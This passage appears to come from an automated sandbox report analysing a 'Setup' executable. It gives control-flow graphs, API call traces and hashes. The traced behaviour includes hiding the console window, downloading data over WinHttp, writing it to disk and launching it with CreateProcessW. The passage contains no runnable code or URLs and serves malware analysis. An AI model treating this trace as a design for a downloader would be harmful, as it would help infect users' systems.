                                                                                                                                                                                                                                control_flow_graph 195 8ed39a-8ed3c5 CreateFileW 196 8ed3ce-8ed3eb 195->196 197 8ed3c7-8ed3c9 195->197 200 8ed3fd-8ed433 call 8eda5a ReadFile 196->200 201 8ed3ed-8ed3fb 196->201 198 8ed45b-8ed45e 197->198 205 8ed445-8ed459 CloseHandle 200->205 206 8ed435-8ed443 200->206 201->198 205->198 206->198
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,?), ref: 008ED3BC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                                                                                                                                                • Instruction ID: 588a83cfb1be399de14a4af1bc62bd1690f046be8d9efd9b5e8ea2b950269bb5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2ed564a57136dcdfd9afc14d4280a279a6561515fd8f8e06747ede3fd6620df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5631CC75A00208FFCB04DF99C891F9EB7B9FF49314F208198E919AB391D631AE46DB54
                                                                                                                                                                                                                                Function 008ED98A Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 208 8ed98a-8ed9b5 CreateFileW 209 8ed9bb-8ed9de WriteFile 208->209 210 8ed9b7-8ed9b9 208->210 212 8ed9f0-8ed9fc 209->212 213 8ed9e0-8ed9ee 209->213 211 8ed9fe-8eda01 210->211 212->211 213->211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 008ED9AC
                                                                                                                                                                                                                                • WriteFile.KERNELBASE(000000FF,00000000,?,00000000,00000000), ref: 008ED9DA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2263783195-0
                                                                                                                                                                                                                                • Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                                                                • Instruction ID: 14a65fd4fd656cb47c6249eade820b41e9f2fe52fdaaf0b675add3b98122d273
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D01ED75640208BBDB10EE59CD41FAEB7B9EF89314F208254FA18DB291D631EE46DB90
                                                                                                                                                                                                                                Function 008ECFCA Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 249 8ecfca-8ed006 call 8eda5a call 8ed59a LoadLibraryW
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 008EDA5A: GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 008ECFFB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobalLibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3361179946-0
                                                                                                                                                                                                                                • Opcode ID: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                                                                                                                                                • Instruction ID: 98dad5a691f0735bf39c6eb89d06a6ed3df86bd1c41a975594da81d3825f7031
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0635a325a859858965f79386bc2292b2c6fb1dc49c835a5e9fb86d575d4b663
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9E0ED75E00208BFCB04EFA8DD8299D7BB9AF49301F108194F908DB344E631AF158BA1
                                                                                                                                                                                                                                Function 008EEFEA Relevance: 1.5, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 254 8eefea-8ef038 call 8ed4ca 259 8ef03a-8ef03c 254->259 260 8ef041-8ef079 254->260 261 8ef21d-8ef220 259->261 264 8ef08e-8ef0ba malloc 260->264 265 8ef07b-8ef089 260->265 266 8ef0c5-8ef0cb 264->266 265->261 268 8ef0cd-8ef0d4 266->268 269 8ef14b-8ef14f 266->269 272 8ef0df-8ef0e5 268->272 270 8ef173-8ef18a call 8ee0ba 269->270 271 8ef151-8ef16e 269->271 280 8ef18c-8ef1a9 270->280 281 8ef1ab-8ef1d7 270->281 271->261 273 8ef146 272->273 274 8ef0e7-8ef101 272->274 273->266 279 8ef106-8ef144 call 8eee5a 274->279 279->272 280->261 283 8ef1e2-8ef1ea 281->283 287 8ef20f-8ef216 283->287 288 8ef1ec-8ef20d 283->288 292 8ef21b 287->292 288->283 292->261
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                                                                • Instruction ID: 2b66b43b390bcb7e80c9d773bd6e0a29a4e1fa20ba0a7aa7eeecfe953d978559
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbb50fb56afd143785edb8b3f824610f8feaaf99d530fe6b5dcc6f423fa21a8f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8191D6B5D00249EFCB08CF99D880AEEBBB5FF89304F108159E519AB355D734AA45CFA0
                                                                                                                                                                                                                                Function 008EDA5A Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 316 8eda5a-8eda68 317 8eda6a-8eda73 316->317 318 8eda76-8eda8f GlobalAlloc 316->318 317->318
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,00000000,00000000), ref: 008EDA8A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                • Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                                                                • Instruction ID: b5732131adc9afa0fe8403c433ed66be94438dfbe0cc7c1c6ccc7eb3dd83d3b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40F04578614208EFCB44DF59D580A59B7B5FB4D360F10C299FC198B351D631EE81DB94

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 008EE18A Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1202815344.00000000008EC000.00000020.00000001.01000000.00000003.sdmp, Offset: 008EC000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ec000_Setup.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                                                                                                                • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:8.1%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:14.3%
                                                                                                                                                                                                                                Total number of Nodes:807
                                                                                                                                                                                                                                Total number of Limit Nodes:19
                                                                                                                                                                                                                                execution_graph 26986 2fe9cf 26987 2fea6b 26986->26987 26989 2fec8f 26986->26989 26994 2fe9e5 26986->26994 26988 2ff1aa 26988->26987 27000 61883c2 26988->27000 27027 61884f7 26988->27027 26989->26987 26990 2fefad 26989->26990 27037 319510 LdrInitializeThunk 26989->27037 26990->26987 26990->26988 27038 319510 LdrInitializeThunk 26990->27038 26991 2ff243 27039 319510 LdrInitializeThunk 26991->27039 26994->26987 26994->26989 26994->26991 27036 319510 LdrInitializeThunk 26994->27036 26995 2ff262 27001 61883ce ___scrt_is_nonwritable_in_current_image 27000->27001 27040 61880ec 27001->27040 27003 61883d5 27004 6188528 27003->27004 27015 61883ff ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 27003->27015 27141 6188ba5 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter std::locale::_Setgloballocale 27004->27141 27006 618852f 27007 6188535 27006->27007 27133 618f9d2 27006->27133 27142 618f996 21 API calls std::locale::_Setgloballocale 27007->27142 27010 618853d 27011 618841e 27011->26987 27012 618849f 27051 6188cba 27012->27051 27015->27011 27015->27012 27136 618f530 39 API calls 4 library calls 27015->27136 27020 61884ba 27137 6188cf0 GetModuleHandleW 27020->27137 27023 61884c5 27024 61884ce 27023->27024 27139 618f987 21 API calls std::locale::_Setgloballocale 27023->27139 27140 618825d 75 API calls ___scrt_uninitialize_crt 27024->27140 27028 6188cf0 std::locale::_Setgloballocale GetModuleHandleW 27027->27028 27029 61884ff 27028->27029 27030 6188503 27029->27030 27031 6188535 27029->27031 27035 618850e 27030->27035 27727 618f978 21 API calls std::locale::_Setgloballocale 27030->27727 27728 618f996 21 API calls std::locale::_Setgloballocale 27031->27728 27033 618853d 27035->26987 27036->26994 27037->26989 27038->26990 27039->26995 27041 61880f5 27040->27041 27143 61885fc IsProcessorFeaturePresent 27041->27143 27043 6188101 27144 618b4ce 10 API calls 2 library calls 27043->27144 27045 6188106 27046 618810a 27045->27046 27145 6190327 27045->27145 27046->27003 27049 6188121 27049->27003 27158 6189b40 27051->27158 27054 61884a5 27055 61903f5 27054->27055 27160 6198fa5 27055->27160 27057 61884ad 27060 6183890 27057->27060 27059 61903fe 27059->27057 27166 6199255 39 API calls 27059->27166 27169 6188f00 27060->27169 27063 61838ea 27281 6182760 41 API calls 3 library calls 27063->27281 27065 6183918 27066 6183947 std::ios_base::_Ios_base_dtor 27065->27066 27072 61842c5 27065->27072 27282 6187f1e 27066->27282 27067 618396a 27069 61839af 27067->27069 27289 6186e80 41 API calls 2 library calls 27067->27289 27171 6182d20 27069->27171 27298 618e289 39 API calls 3 library calls 27072->27298 27073 6183964 27073->27020 27074 61839e4 27186 6183060 27074->27186 27077 61842ca 27299 61866a0 70 API calls 5 library calls 27077->27299 27079 61842de 27079->27020 27081 61839f5 std::ios_base::_Ios_base_dtor 27081->27072 27203 6187975 27081->27203 27082 6183a39 27083 6183060 41 API calls 27082->27083 27084 6183add 27083->27084 27085 6183af9 27084->27085 27086 61842a7 27084->27086 27209 6186d80 27085->27209 27292 6181b60 41 API calls 2 library calls 27086->27292 27089 6183b21 27222 6186510 27089->27222 27090 61842ac 27293 618e289 39 API calls 3 library calls 27090->27293 27093 6183b39 27093->27090 27095 6183b6e std::ios_base::_Ios_base_dtor 27093->27095 27094 61842b1 27294 6181b60 41 API calls 2 library calls 27094->27294 27095->27094 27098 6183b8c 27095->27098 27097 61842b6 27295 618e289 39 API calls 3 library calls 27097->27295 27100 6186d80 41 API calls 27098->27100 27102 6183bb4 27100->27102 27101 61842bb 27296 6181b60 41 API calls 2 library calls 27101->27296 27104 6186510 41 API calls 27102->27104 27106 6183bcc 27104->27106 27105 61842c0 27297 618e289 39 API calls 3 library calls 27105->27297 27106->27097 27108 6183c01 std::ios_base::_Ios_base_dtor 27106->27108 27109 6183c8a 27108->27109 27290 6186e80 41 API calls 2 library calls 27108->27290 27111 6183d0b 27109->27111 27291 6186e80 41 API calls 2 library calls 27109->27291 27226 6183240 27111->27226 27115 6183240 130 API calls 27116 6183d59 27115->27116 27116->27101 27117 6183d6b 27116->27117 27118 6186d80 41 API calls 27117->27118 27119 6183d99 27118->27119 27277 61865d0 27119->27277 27121 6183db8 27122 6186510 41 API calls 27121->27122 27123 6183dc6 27122->27123 27124 61865d0 41 API calls 27123->27124 27126 6183dd7 std::ios_base::_Ios_base_dtor 27124->27126 27125 6183eb2 std::ios_base::_Ios_base_dtor std::locale::_Setgloballocale 27127 6183ed8 CreateProcessW 27125->27127 27126->27105 27126->27125 27128 6183f18 WaitForSingleObject CloseHandle CloseHandle 27127->27128 27130 6183f36 std::ios_base::_Ios_base_dtor 27127->27130 27128->27130 27129 6184285 std::ios_base::_Ios_base_dtor 27131 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27129->27131 27130->27072 27130->27129 27132 61842a1 27131->27132 27132->27020 27681 618f806 27133->27681 27136->27012 27138 61884c1 27137->27138 27138->27006 27138->27023 27139->27024 27140->27011 27141->27006 27142->27010 27143->27043 27144->27045 27149 61993e5 27145->27149 27148 618b4ed 7 API calls 2 library calls 27148->27046 27150 61993f5 27149->27150 27151 6188113 27149->27151 27150->27151 27153 6192e60 27150->27153 27151->27049 27151->27148 27154 6192e67 27153->27154 27155 6192eaa GetStdHandle 27154->27155 27156 6192f0c 27154->27156 27157 6192ebd GetFileType 27154->27157 27155->27154 27156->27150 27157->27154 27159 6188ccd GetStartupInfoW 27158->27159 27159->27054 27161 6198fae 27160->27161 27165 6198fe0 27160->27165 27167 6192b7a 39 API calls 3 library calls 27161->27167 27163 6198fd1 27168 6198db0 49 API calls 3 library calls 27163->27168 27165->27059 27166->27059 27167->27163 27168->27165 27170 61838a0 GetConsoleWindow ShowWindow SleepEx SHGetFolderPathA 27169->27170 27170->27063 27170->27067 27175 6182d50 27171->27175 27172 6182e33 27315 6181b60 41 API calls 2 library calls 27172->27315 27174 6182dc7 27185 6182d70 _Yarn 27174->27185 27316 618e289 39 API calls 3 library calls 27174->27316 27175->27172 27177 6182e2e 27175->27177 27180 6182df8 27175->27180 27181 6182dba 27175->27181 27175->27185 27314 6181ac0 41 API calls 3 library calls 27177->27314 27178 6182e3d 27182 6187f31 std::_Facet_Register 41 API calls 27180->27182 27181->27177 27183 6182dc1 27181->27183 27182->27185 27300 6187f31 27183->27300 27185->27074 27187 618308f __wsopen_s 27186->27187 27188 6187975 41 API calls 27187->27188 27189 61830c7 27188->27189 27191 618318e 27189->27191 27322 61867d0 41 API calls 4 library calls 27189->27322 27192 61831a9 27191->27192 27193 618322a 27191->27193 27195 6186d80 41 API calls 27192->27195 27323 6181b60 41 API calls 2 library calls 27193->27323 27197 61831d4 27195->27197 27196 618322f 27324 618e289 39 API calls 3 library calls 27196->27324 27197->27196 27200 6183200 std::ios_base::_Ios_base_dtor 27197->27200 27199 6183234 27201 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27200->27201 27202 6183223 27201->27202 27202->27081 27325 618e6ea 27203->27325 27205 6187982 27206 6187987 27205->27206 27339 618743d 41 API calls 2 library calls 27205->27339 27206->27082 27210 6186dc4 27209->27210 27219 6186dfc _Yarn 27209->27219 27211 6186e73 27210->27211 27212 6186e23 27210->27212 27213 6186de4 27210->27213 27210->27219 27345 6181ac0 41 API calls 3 library calls 27211->27345 27215 6187f31 std::_Facet_Register 41 API calls 27212->27215 27213->27211 27216 6186def 27213->27216 27215->27219 27220 6187f31 std::_Facet_Register 41 API calls 27216->27220 27217 6186df5 27217->27219 27346 618e289 39 API calls 3 library calls 27217->27346 27219->27089 27220->27217 27221 6186e7d 27223 618652c 27222->27223 27225 618653a _Yarn 27223->27225 27347 6186f80 41 API calls 4 library calls 27223->27347 27225->27093 27227 618326f __wsopen_s std::locale::_Setgloballocale 27226->27227 27228 61832e1 WinHttpCrackUrl 27227->27228 27229 6183361 WinHttpOpen 27228->27229 27230 61832f6 27228->27230 27231 618337a 27229->27231 27232 61833e5 WinHttpConnect 27229->27232 27384 6182760 41 API calls 3 library calls 27230->27384 27385 6182760 41 API calls 3 library calls 27231->27385 27235 6183474 WinHttpOpenRequest 27232->27235 27236 6183406 27232->27236 27237 61834a9 27235->27237 27238 6183516 WinHttpSendRequest 27235->27238 27386 6182760 41 API calls 3 library calls 27236->27386 27387 6182760 41 API calls 3 library calls 27237->27387 27240 6183758 27238->27240 27241 6183531 WinHttpReceiveResponse 27238->27241 27401 6182760 41 API calls 3 library calls 27240->27401 27241->27240 27249 6183542 std::locale::_Setgloballocale 27241->27249 27242 618331e 27247 61837f0 27242->27247 27250 6183352 std::ios_base::_Ios_base_dtor 27242->27250 27244 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27252 61837e9 27244->27252 27245 618342e 27246 6183468 WinHttpCloseHandle 27245->27246 27245->27247 27257 618345e std::ios_base::_Ios_base_dtor 27245->27257 27246->27250 27402 618e289 39 API calls 3 library calls 27247->27402 27348 6185c00 27249->27348 27250->27244 27251 61834d1 27251->27247 27260 6183501 std::ios_base::_Ios_base_dtor 27251->27260 27252->27115 27254 61837c7 WinHttpCloseHandle WinHttpCloseHandle 27254->27250 27255 61837be WinHttpCloseHandle 27255->27254 27256 61837f5 27257->27246 27258 61837b4 std::ios_base::_Ios_base_dtor 27258->27255 27259 6183788 27259->27247 27259->27255 27259->27258 27260->27254 27263 6183629 WinHttpReadData 27265 618368e 27263->27265 27266 6183651 27263->27266 27264 61835b6 27388 6182760 41 API calls 3 library calls 27264->27388 27378 6185b20 27265->27378 27266->27265 27366 6185280 27266->27366 27269 61835e6 27269->27247 27272 61836c6 WinHttpCloseHandle WinHttpCloseHandle WinHttpCloseHandle 27269->27272 27275 618361a std::ios_base::_Ios_base_dtor 27269->27275 27400 6184f10 70 API calls std::ios_base::_Ios_base_dtor 27272->27400 27275->27272 27278 61865f0 27277->27278 27278->27278 27280 618660e _Yarn 27278->27280 27679 6186f80 41 API calls 4 library calls 27278->27679 27280->27121 27281->27065 27283 6187f26 27282->27283 27284 6187f27 IsProcessorFeaturePresent 27282->27284 27283->27073 27286 618896d 27284->27286 27680 6188930 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27286->27680 27288 6188a50 27288->27073 27289->27069 27290->27109 27291->27111 27292->27090 27293->27094 27294->27097 27295->27101 27296->27105 27297->27072 27298->27077 27299->27079 27303 6187f36 27300->27303 27302 6187f50 27302->27174 27303->27302 27305 6187f52 27303->27305 27319 618f4ad EnterCriticalSection LeaveCriticalSection std::_Facet_Register 27303->27319 27320 618e391 15 API calls 2 library calls 27303->27320 27306 6181ac0 Concurrency::cancel_current_task 27305->27306 27307 6187f5c std::_Facet_Register 27305->27307 27317 6189540 RaiseException 27306->27317 27321 6189540 RaiseException 27307->27321 27310 6181adc 27318 61892dd 40 API calls ___std_exception_copy 27310->27318 27311 6188b4c 27313 6181b03 27313->27174 27314->27172 27315->27174 27316->27178 27317->27310 27318->27313 27319->27303 27320->27303 27321->27311 27322->27189 27323->27196 27324->27199 27326 618e70b 27325->27326 27327 618e6f6 27325->27327 27342 6194843 39 API calls 2 library calls 27326->27342 27340 618ee44 14 API calls __dosmaperr 27327->27340 27330 618e716 27333 618e72e 27330->27333 27343 618ee44 14 API calls __dosmaperr 27330->27343 27331 618e6fb 27341 618e279 39 API calls __wsopen_s 27331->27341 27333->27205 27334 618e706 27334->27205 27336 618e71f 27344 618ee44 14 API calls __dosmaperr 27336->27344 27338 618e72a 27338->27205 27340->27331 27341->27334 27342->27330 27343->27336 27344->27338 27345->27217 27346->27221 27347->27225 27403 6186250 27348->27403 27351 6187f31 std::_Facet_Register 41 API calls 27352 6185d8e 27351->27352 27430 61875ee 27352->27430 27354 6185f62 27357 6182620 41 API calls 27354->27357 27355 6185da5 27355->27354 27442 618796c 27355->27442 27365 6185f3a 27357->27365 27359 6185e5d 27450 618d260 39 API calls 2 library calls 27359->27450 27361 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27363 6183575 27361->27363 27362 6185ee3 27451 61866a0 70 API calls 5 library calls 27362->27451 27363->27263 27363->27264 27365->27361 27367 61852c5 27366->27367 27369 61852de 27367->27369 27601 6186090 49 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 27367->27601 27372 6185313 27369->27372 27596 6184670 27369->27596 27370 6182620 41 API calls 27371 61853b0 27370->27371 27602 618747d 8 API calls 27371->27602 27372->27370 27374 61853b5 27375 6183670 WinHttpReadData 27374->27375 27603 61861c0 41 API calls 27374->27603 27375->27265 27375->27266 27379 6183699 27378->27379 27380 6185b32 27378->27380 27379->27272 27389 6182620 27379->27389 27656 6185a50 27380->27656 27382 6185b56 27383 618cfb7 69 API calls 27382->27383 27383->27379 27384->27242 27385->27242 27386->27245 27387->27251 27388->27269 27390 618263a 27389->27390 27391 6182642 27389->27391 27393 6182652 27390->27393 27675 6189540 RaiseException 27390->27675 27391->27272 27676 6182530 41 API calls 3 library calls 27393->27676 27395 6182688 27677 6189540 RaiseException 27395->27677 27397 6182697 27678 61892dd 40 API calls ___std_exception_copy 27397->27678 27399 61826c4 27399->27272 27400->27250 27401->27259 27402->27256 27404 6182620 41 API calls 27403->27404 27405 61862cc 27404->27405 27406 6187f31 std::_Facet_Register 41 API calls 27405->27406 27407 61862d3 27406->27407 27408 61875ee 45 API calls 27407->27408 27409 61862ed 27408->27409 27452 61872b3 27409->27452 27412 61872b3 std::_Lockit::_Lockit 7 API calls 27413 6186348 27412->27413 27416 618730b std::_Lockit::~_Lockit 2 API calls 27413->27416 27415 6186369 27425 61863db 27415->27425 27465 61821e0 76 API calls 7 library calls 27415->27465 27416->27415 27418 61863bf 27419 6186458 27418->27419 27420 61863cb 27418->27420 27467 61820f0 41 API calls 3 library calls 27419->27467 27466 61875bc 41 API calls std::_Facet_Register 27420->27466 27423 618643a 27428 6187f1e __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 27423->27428 27424 61863f7 27424->27423 27427 6182620 41 API calls 27424->27427 27458 618730b 27425->27458 27426 618645d 27427->27423 27429 6185d04 27428->27429 27429->27351 27431 61875fa __EH_prolog3 27430->27431 27432 61872b3 std::_Lockit::_Lockit 7 API calls 27431->27432 27433 6187605 27432->27433 27441 6187636 27433->27441 27472 6187751 41 API calls 2 library calls 27433->27472 27435 618730b std::_Lockit::~_Lockit 2 API calls 27438 6187673 std::locale::_Setgloballocale 27435->27438 27436 6187618 27473 6187774 41 API calls std::locale::_Setgloballocale 27436->27473 27438->27355 27439 6187620 27474 6187546 15 API calls 2 library calls 27439->27474 27441->27435 27443 61878ef 27442->27443 27445 6185e4f 27443->27445 27475 618e6df 27443->27475 27445->27354 27445->27359 27448 6187956 27448->27445 27493 618cfb7 27448->27493 27450->27362 27451->27365 27453 61872c9 27452->27453 27454 61872c2 27452->27454 27456 6186324 27453->27456 27469 6187c62 EnterCriticalSection 27453->27469 27468 618e37a 6 API calls std::_Lockit::_Lockit 27454->27468 27456->27412 27456->27415 27459 618e388 27458->27459 27460 6187315 27458->27460 27471 618e363 LeaveCriticalSection 27459->27471 27461 6187328 27460->27461 27470 6187c70 LeaveCriticalSection 27460->27470 27461->27424 27464 618e38f 27464->27424 27465->27418 27466->27425 27467->27426 27468->27456 27469->27456 27470->27461 27471->27464 27472->27436 27473->27439 27474->27441 27477 618e629 ___scrt_is_nonwritable_in_current_image 27475->27477 27476 618e63c 27507 618ee44 14 API calls __dosmaperr 27476->27507 27477->27476 27479 618e65e 27477->27479 27482 618e670 27479->27482 27483 618e663 27479->27483 27480 618e641 27508 618e279 39 API calls __wsopen_s 27480->27508 27499 6193dff 27482->27499 27509 618ee44 14 API calls __dosmaperr 27483->27509 27484 618793b 27484->27445 27492 618e01a 66 API calls __wsopen_s 27484->27492 27488 618e68c 27511 618e6c8 LeaveCriticalSection ___scrt_uninitialize_crt 27488->27511 27489 618e67f 27510 618ee44 14 API calls __dosmaperr 27489->27510 27492->27448 27494 618cfca __wsopen_s 27493->27494 27537 618ce92 27494->27537 27496 618cfd6 27548 618c8fb 39 API calls __wsopen_s 27496->27548 27498 618cfe2 27498->27445 27500 6193e0b ___scrt_is_nonwritable_in_current_image 27499->27500 27512 618e31b EnterCriticalSection 27500->27512 27502 6193e19 27513 6193ea3 27502->27513 27507->27480 27508->27484 27509->27484 27510->27484 27511->27484 27512->27502 27520 6193ec6 27513->27520 27514 6193f1e 27532 619413f 14 API calls 2 library calls 27514->27532 27516 6193f27 27533 6193bc1 14 API calls __dosmaperr 27516->27533 27519 6193f30 27522 6193e26 27519->27522 27534 61946f3 6 API calls std::_Lockit::_Lockit 27519->27534 27520->27514 27520->27520 27520->27522 27530 618d2a6 EnterCriticalSection 27520->27530 27531 618d2ba LeaveCriticalSection 27520->27531 27527 6193e5f 27522->27527 27524 6193f4f 27535 618d2a6 EnterCriticalSection 27524->27535 27526 6193f62 27526->27522 27536 618e363 LeaveCriticalSection 27527->27536 27529 618e679 27529->27488 27529->27489 27530->27520 27531->27520 27532->27516 27533->27519 27534->27524 27535->27526 27536->27529 27538 618ce9e ___scrt_is_nonwritable_in_current_image 27537->27538 27539 618cea8 27538->27539 27540 618cecb 27538->27540 27564 618e1fc 39 API calls 2 library calls 27539->27564 27542 618cec3 27540->27542 27549 618d2a6 EnterCriticalSection 27540->27549 27542->27496 27544 618cee9 27550 618cf29 27544->27550 27546 618cef6 27565 618cf21 LeaveCriticalSection ___scrt_uninitialize_crt 27546->27565 27548->27498 27549->27544 27551 618cf59 27550->27551 27552 618cf36 27550->27552 27563 618cf51 27551->27563 27566 618cd68 27551->27566 27572 618e1fc 39 API calls 2 library calls 27552->27572 27557 618cf79 27574 6192502 27557->27574 27559 618cf85 27581 6193c8c 44 API calls __wsopen_s 27559->27581 27561 618cf8c 27561->27563 27582 6193bc1 14 API calls __dosmaperr 27561->27582 27563->27546 27564->27542 27565->27542 27567 618cd81 27566->27567 27571 618cda8 27566->27571 27568 6192502 ___scrt_uninitialize_crt 39 API calls 27567->27568 27567->27571 27569 618cd9d 27568->27569 27583 6193894 27569->27583 27573 6193f65 14 API calls ___free_lconv_mon 27571->27573 27572->27563 27573->27557 27575 619250e 27574->27575 27576 6192523 27574->27576 27594 618ee44 14 API calls __dosmaperr 27575->27594 27576->27559 27578 6192513 27595 618e279 39 API calls __wsopen_s 27578->27595 27580 619251e 27580->27559 